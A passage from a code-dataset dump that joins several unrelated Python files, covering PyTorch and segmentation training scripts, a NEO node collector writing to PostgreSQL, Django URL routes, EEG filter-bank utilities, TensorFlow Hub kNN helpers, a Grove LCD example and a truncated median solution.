gt_data[:, 0:2]\n gt_time = gt_data[:, 2:]\n\n loc_loss = args['loc_scale'] * mse_loss(pred_loc, gt_loc)\n time_loss = args['time_scale'] * mse_loss(pred_time, gt_time)\n meters.update('loc_loss', loc_loss.data)\n meters.update('time_loss', time_loss.data)\n\n loss = loc_loss + time_loss\n loss.backward()\n optimizer.step()\n\n meters.update('batch_time', time.time() - timer)\n if idx % args['log_freq'] == 0:\n logger.info('step: [{0}][{1}/{2}]\\t'\n 'loc_loss: {meters[loc_loss]:.4f}\\t'\n 'time_loss: {meters[time_loss]:.4f}\\t'\n .format(epoch, idx, len(train_loader), meters=meters))\n\n\ndef test(model, val_loader, epoch):\n\n \"\"\"\n Takes entire batch of results and compute the SAD\n \"\"\"\n def getSAD(vec1, vec2):\n return torch.mean(torch.abs(vec1.data - vec2.data))\n\n meters = utils.AverageMeterSet()\n\n model.eval()\n for idx, (user_id, in_data, gt_data) in enumerate(val_loader):\n timer = time.time()\n\n user_id = Variable(user_id).cuda()\n in_data = Variable(in_data).cuda()\n gt_data = Variable(gt_data).cuda()\n\n pred_loc, pred_time = model.forward(in_data)\n\n gt_loc = gt_data[:, 0:2]\n gt_time = gt_data[:, 2:]\n\n loc_l1 = getSAD(pred_loc, gt_loc)\n time_l1 = getSAD(pred_time, gt_time)\n \n meters.update('loc_l1', loc_l1)\n meters.update('time_l1', time_l1)\n\n meters.update('batch_time', time.time() - timer)\n if idx % args['log_freq'] == 0:\n logger.info('step: [{0}][{1}/{2}]\\t'\n 'loc_l1: {meters[loc_l1]:.4f}\\t'\n 'time_l1: {meters[time_l1]:.4f}\\t'\n .format(epoch, idx, len(val_loader), meters=meters))\n\n logger.info('--- finish test ---\\n'\n 'loc_l1: {meters[loc_l1]:.4f}\\t'\n 'time_l1: {meters[time_l1]:.4f}\\t'\n .format(epoch, idx, len(val_loader), meters=meters))\n\n\nif __name__ == '__main__':\n logging.basicConfig(level=logging.INFO, format='%(message)s')\n \n main()","sub_path":"assignment2/scripts/p1_baseline.py","file_name":"p1_baseline.py","file_ext":"py","file_size_in_byte":7380,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"444309262","text":"from wxpy import *\nfrom configparser import ConfigParser\nfrom General import General\nfrom tkinter import Tk\nfrom tkinter.messagebox import showinfo\nimport threading\nimport pyaudio\nimport wave\n\ncfg = General.get_config()[0]\n\ndef continuous_output(text):\n print(text)\n\ndef final_output(text):\n from_ = cfg.get('Notify', 'Mail_from')\n pwd = cfg.get('Notify', 'Password')\n to = cfg.get('Notify', 'Mail_to')\n mail = Mail(from_, pwd, to)\n\ndef play_audio(filename):\n CHUNK = 1024\n wf = wave.open(filename, 'rb')\n p = pyaudio.PyAudio()\n stream = p.open(format=p.get_format_from_width(wf.getsampwidth()),\n channels=wf.getnchannels(),\n rate=wf.getframerate(),\n output=True)\n data = wf.readframes(CHUNK)\n while data != b'':\n stream.write(data)\n data = wf.readframes(CHUNK)\n stream.stop_stream()\n stream.close()\n p.terminate()\n\ndef play_audio_async(filename):\n do_therad = threading.Thread(target=play_audio, args=[filename])\n do_therad.start()\n\ndef show_messagebox(text):\n root = Tk()\n root.withdraw()\n showinfo(message = text)\n root.destroy()\n\ndef show_messagebox_async(text):\n do_therad = threading.Thread(target=show_messagebox, args=[text])\n do_therad.start()\n\nclass Robot:\n def __init__(self):\n self.cfg = ConfigParser()\n self.cfg.read('.config.ini', encoding='utf8')\n try:\n self.bot = Bot(cache_path=True, console_qr=2)\n except:\n print('此账号已被列入黑名单,无法登陆!')\n\n # @self.bot.register(my_friend)\n def reply_my_friend(msg):\n return 'received: {} ({})'.format(msg.text, msg.type)\n\n\nclass Mail:\n def __init__(self, from_, psw, to):\n pass\n\n\nif __name__ == '__main__':\n a = Robot()\n","sub_path":"Notify.py","file_name":"Notify.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"278380729","text":"import psycopg2\nimport requests\nimport json\nimport time\nimport socket\nimport dns.resolver\nimport socket\nimport os\nimport requests\nimport time\n\nresolver = dns.resolver.Resolver(configure=False)\nresolver.nameservers = [\"208.67.222.222\", \"208.67.220.220\", '8.8.8.8', '2001:4860:4860::8888',\n '8.8.4.4', '2001:4860:4860::8844']\n\nhost = str(os.environ['PGHOST'])\ndatabasename = str(os.environ['PGDATABASE'])\nuser = str(os.environ['PGUSER'])\npassword = str(os.environ['PGPASSWORD'])\n\nconnection_str = \"dbname='{}' user='{}' host='{}' password='{}'\".format(\n databasename, user, host, password)\n# connection_str = \"dbname='{}' user='{}' host='localhost' password='{}'\".format(\n# databasename, user, host, password)\n\nprint(connection_str)\n\ndef get_coz_mainnet_json():\n r = requests.get(\n 'https://raw.githubusercontent.com/CityOfZion/neo-mon/master/docs/assets/mainnet.json')\n return json.loads(r.text)\n\ndef get_existing_nodes(cursor):\n # For mainnet json, we use hostname to check whether a node\n # exists in our database, since there is a chance that \n # that a node has multiple ips for load-balancing\n nodes_dict = {}\n cursor.execute(\"select id, hostname, ip from nodes\")\n results = cursor.fetchall()\n\n for id, hostname, ip in results:\n nodes_dict[hostname] = (id, hostname, ip)\n\n return nodes_dict\n\ndef get_existing_connections(cursor):\n connections_dict = {}\n cursor.execute(\"select id, hostname, node_id, protocol, port from connection_endpoints\")\n\n results = cursor.fetchall()\n\n for id, hostname, node_id, protocol, port in results:\n connections_dict[hostname] = (id, hostname, node_id, protocol, port)\n\n return connections_dict\n\n\ndef create_or_update_nodes_rows(cursor, data):\n key = 0\n for endpoint in data[\"sites\"]:\n if endpoint[\"type\"] == \"RPC\":\n hostname = endpoint[\"url\"].split(\"//\")[-1].split(\":\")[0]\n ip = socket.gethostbyname(endpoint[\"url\"])\n\n nodes_dict = get_existing_nodes(cursor)\n \n if hostname not in nodes_dict:\n # add new rows in nodes\n print(\"insert new rows into nodes table. hostname: {} ip: {}\".format(hostname, ip))\n cursor.execute(\n \"INSERT INTO nodes (hostname, ip) VALUES (%s, %s)\", [hostname, ip])\n else:\n (id, hostnameFromDatabase, ipFromDatabase) = nodes_dict[hostname]\n\n if ipFromDatabase!=ip:\n # IP has changes, some nodes uses loadbalancing and changes their ip all the time\n print(\"update node's ip. hostname: {} id: {} ipFromDatabase: {} ip:{}\".format(hostname, id, ipFromDatabase, ip))\n cursor.execute(\"UPDATE nodes SET ip=%s WHERE id=%s;\", [ip, id])\n \ndef check_mainnet_json(data):\n # Check if the mainnet has the correct key and structure that is expected\n if \"sites\" not in data or \"name\" not in data or \"pollTime\" not in data:\n return False\n \n for site in data[\"sites\"]:\n if \"url\" not in site or \"locale\" not in site or \"location\" not in site or \"type\" not in site:\n return False\n return True\n\ndef create_connectionendpoints_rows(cursor, data):\n key = 0\n for endpoint in data[\"sites\"]:\n if endpoint[\"type\"] == \"RPC\":\n hostname = endpoint[\"url\"].split(\"//\")[-1].split(\":\")[0]\n ip = socket.gethostbyname(endpoint[\"url\"])\n\n nodes_dict = get_existing_nodes(cursor)\n\n (node_id, hostnameFromDatabase, ipFromDatabase) = nodes_dict[hostname]\n\n protocol = endpoint[\"protocol\"]\n port = endpoint[\"port\"] if \"port\" in endpoint else 10332\n\n cursor.execute(\"SELECT id, node_id, protocol, port FROM public.connection_endpoints where node_id=%s and protocol=%s and port=%s\", [int(node_id),str(protocol),int(port)])\n\n rows = cursor.fetchall()\n\n if len(rows)==0:\n # this connection endpoints does not exist in the database\n print(\"insert into connection endpoints, hostname:{} node_id: {} protocol: {} port: {}\".format(hostname, int(node_id), str(protocol), int(port)))\n cursor.execute(\"INSERT INTO public.connection_endpoints (node_id, protocol, port) VALUES (%s, %s, %s) RETURNING id\", [int(node_id), str(protocol), int(port)])\n\n lastid = cursor.fetchone()[0]\n\n cursor.execute(\"INSERT INTO locale (connection_id, locale) VALUES (%s, %s)\", [\n lastid, endpoint[\"locale\"]])\n cursor.execute(\"INSERT INTO location (connection_id, location) VALUES (%s, %s)\", [\n lastid, endpoint[\"location\"]])\n\n response = requests.get(\"https://geoip.nekudo.com/api/\"+ip)\n json_data = json.loads(response.text)\n\n lat = json_data[\"location\"]['latitude']\n long = json_data[\"location\"]['longitude']\n\n cursor.execute(\"INSERT INTO coordinates (connection_id, lat, long) VALUES (%s, %s, %s)\", [lastid, lat, long])\n \nif __name__ == \"__main__\":\n while True:\n connect_str = connection_str\n\n conn = psycopg2.connect(connect_str)\n\n cursor = conn.cursor()\n\n data = get_coz_mainnet_json()\n\n if check_mainnet_json(data):\n create_or_update_nodes_rows(cursor, data)\n conn.commit()\n\n create_connectionendpoints_rows(cursor, data)\n conn.commit()\n\n cursor.close()\n conn.close()\n else:\n raise ValueError(\"mainnet.json file is not in the right format\")\n\n\n # sleep for a day\n time.sleep(60*60*24)\n\n\n","sub_path":"neo-collector/create/createOrUpdatePrimaryTables.py","file_name":"createOrUpdatePrimaryTables.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"31625205","text":"#-*- coding:utf-8 -*-\nfrom django.conf.urls import *\nfrom blog.views import *\nfrom blog.models import LatestArticlesFeed\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n (r'^$', home),\n (r'^category/(?P.+)/$', home),\n (r'^archive/(?P.+)/$', home),\n (r'^tag/(?P.+)/$', home),\n (r'^article/(?P\\d+)/$', detail),\n (r'^comment/(?P\\d+)/$', comment),\n (r'^fvck@dm!n/', include(admin.site.urls)),\n (r\"^feeds/$\", LatestArticlesFeed()),\n (r\"^pre-view/$\", pre_view),\n (r\"^resume/$\", resume),\n (r\"^today-visitors/$\", today_visitors),\n (r\"^online-visitors/$\", online_visitors),\n (r\"^visit-count/$\", visit_count),\n (r\"^alipay/$\", alipay),\n (r\"^auth-xss/$\", auth_xss),\n )\n","sub_path":"ashin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"232171644","text":"import os\nimport sys\nimport warnings\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\nwarnings.filterwarnings('ignore')\n\nimport argparse\nimport functools\nimport time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom simpleAICV.segmentation.common import SegmentationCollater\n\nfrom tools.scripts import train_segmentation, compute_segmentation_test_loss\nfrom tools.utils import (get_logger, set_seed, worker_seed_init_fn,\n compute_flops_and_params, build_optimizer,\n build_scheduler, build_training_mode)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='PyTorch Detection Model Training')\n parser.add_argument(\n '--work-dir',\n type=str,\n help='path for get training config and saving log/models')\n parser.add_argument(\n '--local_rank',\n type=int,\n default=0,\n help='LOCAL_PROCESS_RANK in DistributedDataParallel model')\n\n return parser.parse_args()\n\n\ndef main():\n assert torch.cuda.is_available(), 'need gpu to train network!'\n torch.cuda.empty_cache()\n\n args = parse_args()\n sys.path.append(args.work_dir)\n from train_config import config\n log_dir = os.path.join(args.work_dir, 'log')\n checkpoint_dir = os.path.join(args.work_dir, 'checkpoints')\n resume_model = os.path.join(checkpoint_dir, 'latest.pth')\n\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n\n global logger\n logger = get_logger('train', log_dir)\n\n set_seed(config.seed)\n\n local_rank = args.local_rank\n # start init process\n if config.distributed:\n torch.distributed.init_process_group(backend='nccl',\n init_method='env://')\n torch.cuda.set_device(local_rank)\n\n init_fn = functools.partial(worker_seed_init_fn,\n num_workers=config.num_workers,\n local_rank=local_rank,\n seed=config.seed)\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n config.train_dataset, shuffle=True) if config.distributed else None\n collater = SegmentationCollater()\n train_loader = DataLoader(config.train_dataset,\n batch_size=config.batch_size,\n shuffle=(train_sampler is None),\n pin_memory=True,\n num_workers=config.num_workers,\n collate_fn=collater.next,\n sampler=train_sampler,\n worker_init_fn=init_fn)\n val_sampler = torch.utils.data.distributed.DistributedSampler(\n config.val_dataset, shuffle=False) if config.distributed else None\n val_loader = DataLoader(config.val_dataset,\n batch_size=config.batch_size,\n shuffle=False,\n pin_memory=True,\n num_workers=config.num_workers,\n collate_fn=collater.next,\n sampler=val_sampler)\n\n for key, value in config.__dict__.items():\n if not key.startswith('__'):\n if key not in [\n 'model', 'criterion', 'decoder', 'train_dataset',\n 'val_dataset'\n ]:\n log_info = f'{key}: {value}'\n logger.info(log_info) if (\n config.distributed\n and local_rank == 0) or not config.distributed else None\n\n gpus_type, gpus_num = torch.cuda.get_device_name(\n ), torch.cuda.device_count()\n log_info = f'gpus_type: {gpus_type}, gpus_num: {gpus_num}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n model = config.model.cuda()\n criterion = config.criterion.cuda()\n decoder = config.decoder.cuda()\n\n # parameters needs to be updated by the optimizer\n # buffers doesn't needs to be updated by the optimizer\n for name, param in model.named_parameters():\n log_info = f'name: {name}, grad: {param.requires_grad}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n for name, buffer in model.named_buffers():\n log_info = f'name: {name}, grad: {buffer.requires_grad}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n optimizer = build_optimizer(config, model)\n scheduler = build_scheduler(config, optimizer)\n model = build_training_mode(config, model, optimizer)\n\n start_epoch = 1\n # automatically resume model for training if checkpoint model exist\n if os.path.exists(resume_model):\n checkpoint = torch.load(resume_model, map_location=torch.device('cpu'))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n scheduler.load_state_dict(checkpoint['scheduler_state_dict'])\n saved_epoch = checkpoint['epoch']\n start_epoch += saved_epoch\n test_loss, lr = checkpoint['test_loss'], checkpoint['lr']\n\n log_info = f'resuming model from {resume_model}. resume_epoch: {saved_epoch}, test_loss: {test_loss:.4f}, lr: {lr:.6f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n # calculate training time\n start_time = time.time()\n best_test_loss = 100000000.\n\n for epoch in range(start_epoch, config.epochs + 1):\n torch.cuda.empty_cache()\n train_sampler.set_epoch(epoch) if config.distributed else None\n loss = train_segmentation(train_loader, model, criterion, optimizer,\n scheduler, epoch, logger, config)\n log_info = f'train: epoch {epoch:0>3d}, total_loss: {loss:.4f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n test_loss = None\n if epoch in config.eval_epoch or epoch == config.epochs:\n test_loss = compute_segmentation_test_loss(val_loader, model,\n criterion)\n log_info = f'eval: epoch: {epoch:0>3d}, test_loss: {test_loss:.4f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n if (config.distributed and local_rank == 0) or not config.distributed:\n # save best test loss model and each epoch checkpoint\n if test_loss and test_loss < best_test_loss:\n torch.save(model.module.state_dict(),\n os.path.join(checkpoint_dir, 'best.pth'))\n best_test_loss = test_loss\n\n torch.save(\n {\n 'epoch': epoch,\n 'test_loss': best_test_loss,\n 'lr': scheduler.get_lr()[0],\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'scheduler_state_dict': scheduler.state_dict(),\n }, os.path.join(checkpoint_dir, 'latest.pth'))\n\n if (config.distributed and local_rank == 0) or not config.distributed:\n if os.path.exists(os.path.join(checkpoint_dir, 'best.pth')):\n os.rename(\n os.path.join(checkpoint_dir, 'best.pth'),\n os.path.join(\n checkpoint_dir,\n f'{config.network}-epoch{epoch}-best_test_loss{best_test_loss:.3f}.pth'\n ))\n\n training_time = (time.time() - start_time) / 3600\n flops, params = compute_flops_and_params(config, model)\n log_info = f'train done. model: {config.network}, flops: {flops}, params: {params}, training time: {training_time:.3f} hours, best_test_loss: {best_test_loss:.3f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/train_segmentation_model.py","file_name":"train_segmentation_model.py","file_ext":"py","file_size_in_byte":8389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"78410695","text":"import os\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\n\nsource_path = '/gpfs/exfel/data/user/juncheng/crystalProject/data/simulation/source'\nsource_name = 'g8_0kev.h5'\ndest_name = source_name\n#dest_name = os.path.basename(source_name)+'-t.h5'\nos.chdir(source_path)\n#copyfile(source_name, dest_name)\n\n\ndef checkNval(source_name): \n with h5py.File(source_name,'r') as f:\n print ('arrEhor Shape:', f['data/arrEhor'].shape)\n print ('nVal =',f['params/nval'][...])\n f.close()\n\ndef figProj(data,extent):\n # extent = [xMin, xMax, yMin, yMax]\n figure = plt.figure(figsize=(10, 10), dpi=100)\n plt.axis('tight')\n profile = plt.subplot2grid((3, 3), (1, 0), colspan=2, rowspan=2)\n profile.imshow(data, extent=extent)\n\n x = np.linspace(extent[0],extent[1],data.shape[1])\n y = np.linspace(extent[2],extent[3],data.shape[0])\n\n # x-projection plots above main plot.\n x_projection = plt.subplot2grid((3, 3), (0, 0), sharex=profile, colspan=2)\n x_projection.plot(x, np.sum(data,axis=0), label='x projection')\n # y-projection plot right of main plot.\n y_projection = plt.subplot2grid((3, 3), (1, 2), rowspan=2, sharey=profile)\n y_projection.plot(np.sum(data,axis=0), y, label='y projection')\n plt.minorticks_off()\n profile.set_xlim([extent[0], extent[1]])\n profile.set_ylim([extent[2], extent[3]])\n\n return (figure,profile,x_projection,y_projection)\n\n\n#%%\n# Create .h5 file\nwith h5py.File(dest_name, 'a') as f:\n try: \n del f['/params/wEFieldUnit']\n except:\n pass\n dt = h5py.string_dtype(encoding='ascii')\n f.create_dataset('/params/wEFieldUnit',(1,), dtype= dt , data= 'sqrt(W/mm^2)')\n f.flush()\n f.close()\n","sub_path":"src/controller/singFEL/sourceUnit.py","file_name":"sourceUnit.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"211847342","text":"# -*- coding: utf-8 -*-\n#\n# Authors: Swolf \n# Date: 2021/1/07\n# License: MIT License\nfrom typing import Optional, List, Tuple\n\nimport numpy as np\nfrom numpy import ndarray\nfrom scipy.linalg import solve\nfrom scipy.signal import sosfiltfilt, cheby2, cheb2ord, cheby1, cheb1ord\nfrom sklearn.base import BaseEstimator, TransformerMixin, clone\n\ndef robust_pattern(W: ndarray, Cx: ndarray, Cs: ndarray) -> ndarray:\n \"\"\"Transform spatial filters to spatial patterns based on paper [1]_.\n\n Parameters\n ----------\n W : ndarray\n Spatial filters, shape (n_channels, n_filters).\n Cx : ndarray\n Covariance matrix of eeg data, shape (n_channels, n_channels).\n Cs : ndarray\n Covariance matrix of source data, shape (n_channels, n_channels).\n\n Returns\n -------\n A : ndarray\n Spatial patterns, shape (n_channels, n_patterns), each column is a spatial pattern.\n\n References\n ----------\n .. [1] Haufe, Stefan, et al. \"On the interpretation of weight vectors of linear models in multivariate neuroimaging.\" Neuroimage 87 (2014): 96-110.\n \"\"\"\n # use linalg.solve instead of inv, makes it more stable\n # see https://github.com/robintibor/fbcsp/blob/master/fbcsp/signalproc.py\n # and https://ww2.mathworks.cn/help/matlab/ref/mldivide.html\n A = solve(Cs.T, np.dot(Cx, W).T).T\n return A \n\nclass FilterBank(BaseEstimator, TransformerMixin):\n def __init__(self, base_estimator: Optional[BaseEstimator] = None,\n filterbank: Optional[List[ndarray]] = None):\n self.base_estimator = base_estimator\n self.filterbank = filterbank\n\n def fit(self, X: ndarray, y: ndarray):\n # transform filterbank\n X = self.transform_filterbank(X)\n self.estimators_ = [\n clone(self.base_estimator) for _ in range(len(X))]\n for i, estimator in enumerate(self.estimators_):\n estimator.fit(X[i], y)\n return self\n\n def transform(self, X: ndarray):\n X = self.transform_filterbank(X)\n features = np.concatenate(\n [est.transform(X[i]) for i, est in enumerate(self.estimators_)], axis=-1)\n return features\n\n def _check_filterbank(self):\n if hasattr(self, 'filterbank') and isinstance(self.filterbank, list):\n if self.filterbank[0].ndim != 2 or self.filterbank[0].shape[1] != 6:\n raise ValueError(\"only sos coefficients supported.\")\n return True\n return False\n\n def transform_filterbank(self, X: ndarray):\n if self._check_filterbank():\n Xs = np.stack([sosfiltfilt(sos, X, axis=-1) for sos in self.filterbank])\n return Xs\n else:\n return X[np.newaxis, ...]\n\ndef generate_filterbank(\n passbands: List[Tuple[float, float]],\n stopbands: List[Tuple[float, float]],\n srate: int):\n filterbank = []\n for wp, ws in zip(passbands, stopbands):\n # N, wn = cheb2ord(wp, ws, 3, 40, fs=srate)\n # sos = cheby2(N, 0.5, wn, btype='bandpass', output='sos', fs=srate)\n N, wn = cheb1ord(wp, ws, 3, 40, fs=srate)\n sos = cheby1(N, 0.5, wn, btype='bandpass', output='sos', fs=srate)\n\n filterbank.append(sos)\n return filterbank\n\ndef generate_cca_references(freqs, srate, T, \n phases: Optional[ndarray] = None,\n n_harmonics: int = 1):\n if isinstance(freqs, int) or isinstance(freqs, float):\n freqs = [freqs] \n freqs = np.array(freqs)[:, np.newaxis]\n if phases is None:\n phases = 0\n if isinstance(phases, int) or isinstance(phases, float):\n phases = [phases] \n phases = np.array(phases)[:, np.newaxis]\n t = np.linspace(0, T, int(T*srate))\n\n Yf = []\n for i in range(n_harmonics):\n Yf.append(np.stack([\n np.sin(2*np.pi*(i+1)*freqs*t + np.pi*phases),\n np.cos(2*np.pi*(i+1)*freqs*t + np.pi*phases)], axis=1))\n Yf = np.concatenate(Yf, axis=1)\n return Yf\n\ndef sign_flip(u, s, vh=None):\n \"\"\"Flip signs of SVD or EIG using the method in paper [1]_.\n\n Parameters\n ----------\n u: ndarray\n left singular vectors, shape (M, K).\n s: ndarray\n singular values, shape (K,).\n vh: ndarray or None\n transpose of right singular vectors, shape (K, N).\n\n Returns\n -------\n u: ndarray\n corrected left singular vectors.\n s: ndarray\n singular values.\n vh: ndarray\n transpose of corrected right singular vectors.\n\n References\n ----------\n .. [1] https://www.sandia.gov/~tgkolda/pubs/pubfiles/SAND2007-6422.pdf\n \"\"\"\n if vh is None:\n total_proj = np.sum(u*s, axis=0)\n signs = np.sign(total_proj)\n \n random_idx = (signs==0)\n if np.any(random_idx):\n signs[random_idx] = 1\n warnings.warn(\"The magnitude is close to zero, the sign will become arbitrary.\")\n \n u = u*signs\n \n return u, s\n else:\n left_proj = np.sum(s[:, np.newaxis]*vh, axis=-1)\n right_proj = np.sum(u*s, axis=0)\n total_proj = left_proj + right_proj\n signs = np.sign(total_proj)\n \n random_idx = (signs==0)\n if np.any(random_idx):\n signs[random_idx] = 1\n warnings.warn(\"The magnitude is close to zero, the sign will become arbitrary.\")\n\n u = u*signs\n vh = signs[:, np.newaxis]*vh\n\n return u, s, vh\n\n\n \n","sub_path":"brainda/algorithms/decomposition/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"595603103","text":"# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Utils for module search functionality.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport tensorflow_datasets as tfds\n\n\ndef compute_distance_matrix(x_train, x_test, measure=\"squared_l2\"):\n \"\"\"Calculates the distance matrix between test and train.\n\n Args:\n x_train: Matrix (NxD) where each row represents a training sample\n x_test: Matrix (MxD) where each row represents a test sample\n measure: Distance measure (not necessarly metric) to use\n\n Raises:\n NotImplementedError: When the measure is not implemented\n\n Returns:\n Matrix (MxN) where elemnt i,j is the distance between\n x_test_i and x_train_j.\n \"\"\"\n\n x_train = tf.convert_to_tensor(x_train, tf.float64)\n x_test = tf.convert_to_tensor(x_test, tf.float64)\n\n if measure == \"squared_l2\":\n x_xt = tf.matmul(x_test, tf.transpose(x_train)).numpy()\n\n x_train_2 = tf.reduce_sum(tf.math.square(x_train), 1).numpy()\n x_test_2 = tf.reduce_sum(tf.math.square(x_test), 1).numpy()\n\n for i in range(np.shape(x_xt)[0]):\n x_xt[i, :] = np.multiply(x_xt[i, :], -2)\n x_xt[i, :] = np.add(x_xt[i, :], x_test_2[i])\n x_xt[i, :] = np.add(x_xt[i, :], x_train_2)\n\n else:\n raise NotImplementedError(\"Method '{}' is not implemented\".format(measure))\n\n return x_xt\n\n\ndef compute_distance_matrix_loo(x, measure=\"squared_l2\"):\n \"\"\"Calculates the distance matrix for leave-one-out strategy.\n\n Args:\n x: Matrix (NxD) where each row represents a sample\n measure: Distance measure (not necessarly metric) to use\n\n Raises:\n NotImplementedError: When the measure is not implemented\n\n Returns:\n Matrix (NxN) where elemnt i,j is the distance between x_i and x_j.\n The diagonal is set to infinity\n \"\"\"\n\n x = tf.convert_to_tensor(x, tf.float64)\n\n if measure == \"squared_l2\":\n x_xt = tf.matmul(x, tf.transpose(x)).numpy()\n diag = np.diag(x_xt)\n d = np.copy(x_xt)\n\n for i in range(np.shape(d)[0]):\n d[i, :] = np.multiply(d[i, :], -2)\n d[i, :] = np.add(d[i, :], x_xt[i, i])\n d[i, :] = np.add(d[i, :], diag)\n d[i, i] = float(\"inf\")\n\n elif measure == \"cosine\":\n d = tf.matmul(x, tf.transpose(x)).numpy()\n diag_sqrt = np.sqrt(np.diag(d))\n outer = np.outer(diag_sqrt, diag_sqrt)\n d = np.ones(np.shape(d)) - np.divide(d, outer)\n np.fill_diagonal(d, float(\"inf\"))\n\n else:\n raise NotImplementedError(\"Method '{}' is not implemented\".format(measure))\n\n return d\n\n\ndef knn_errorrate(d, y_train, y_test, k=1):\n \"\"\"Calculate the knn error rate based on the distance matrix d.\n\n Args:\n d: distance matrix\n y_train: label vector for the training samples\n y_test: label vector for the test samples\n k: number of direct neighbors for knn\n\n Returns:\n knn error rate (1 - accuracy)\n \"\"\"\n\n if k == 1:\n indices = np.argmin(d, axis=1)\n\n cnt = 0\n for i in range(len(indices)):\n if y_test[i] != y_train[indices[i]]:\n cnt += 1\n\n return float(cnt) / len(indices)\n\n indices = np.argpartition(d, k - 1, axis=1)\n cnt = 0\n for i in range(np.shape(d)[0]):\n cnt_i = 0\n for j in range(k):\n if y_test[i] != y_train[indices[i, j]]:\n cnt_i += 1\n if cnt_i >= k / 2.0:\n cnt += 1\n\n return float(cnt) / np.shape(d)[0]\n\n\ndef knn_errorrate_loo(d, y, k=1):\n \"\"\"Calculate the leave-one-out expected knn error rate based\n on the distance matrix d.\n\n Args:\n d: distance matrix, the diagonal should be infinity\n y: label matrix\n k: number of direct neighbors for knn\n\n Returns:\n Expected leave-one-out knn error rate (1 - accuracy)\n \"\"\"\n\n if k == 1:\n indices = np.argmin(d, axis=1)\n\n cnt = 0\n for i in range(len(indices)):\n if y[i] != y[indices[i]]:\n cnt += 1\n\n return float(cnt) / len(indices)\n\n indices = np.argpartition(d, k - 1, axis=1)\n cnt = 0\n for i in range(np.shape(d)[0]):\n cnt_i = 0\n for j in range(k):\n if y[i] != y[indices[i, j]]:\n cnt_i += 1\n if cnt_i >= k / 2.0:\n cnt += 1\n\n return float(cnt) / np.shape(d)[0]\n\n\ndef load_data(dataset, split, num_examples=None):\n ds = tfds.load(dataset, split=split, shuffle_files=False)\n if num_examples:\n ds = ds.take(num_examples)\n return ds\n\n\ndef load_embedding_fn(module):\n m = hub.load(module, tags=[])\n return lambda x: m.signatures[\"default\"](x)[\"default\"]\n","sub_path":"tensorflow_hub/tools/module_search/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438428276","text":"#!/usr/bin/env python\n#\n# Example for using the Grove - LCD RGB Backlight\n#\n# You can learn more about LeMaker Guitar here: http://www.lemaker.org/cn/product-guitar-specification.html\n# Modules: \n# \thttp://www.seeedstudio.com/wiki/Grove_-_LCD_RGB_Backlight\n#\n# Have a question about this example? Ask on the forums here: http://forum.lemaker.org/cn/forum.php?gid=169 \n#\n# NOTE:\n# \tOnly supports setting the backlight colour and putting a text string onto the display\n\nfrom grove_rgb_lcd import *\nimport time\n\nsetRGB(0,255,0)\nbuf=list(\"Grove -Update without erase\")\nsetText(\"\".join(buf))\ntime.sleep(1)\n\nfor i in range(len(buf)):\n\tbuf[i]=\".\"\n\tsetText_norefresh(\"\".join(buf))\n\ttime.sleep(.1)\n","sub_path":"GroveOnGuitar/GroveOnGuitar/grove_rgb_lcd/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"495315792","text":"class Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n newnum = nums1\n newnum.extend(nums2)\n newnum.sort()\n \n numLen = len(newnum)\n \n if numLen %2 == 0:\n median = 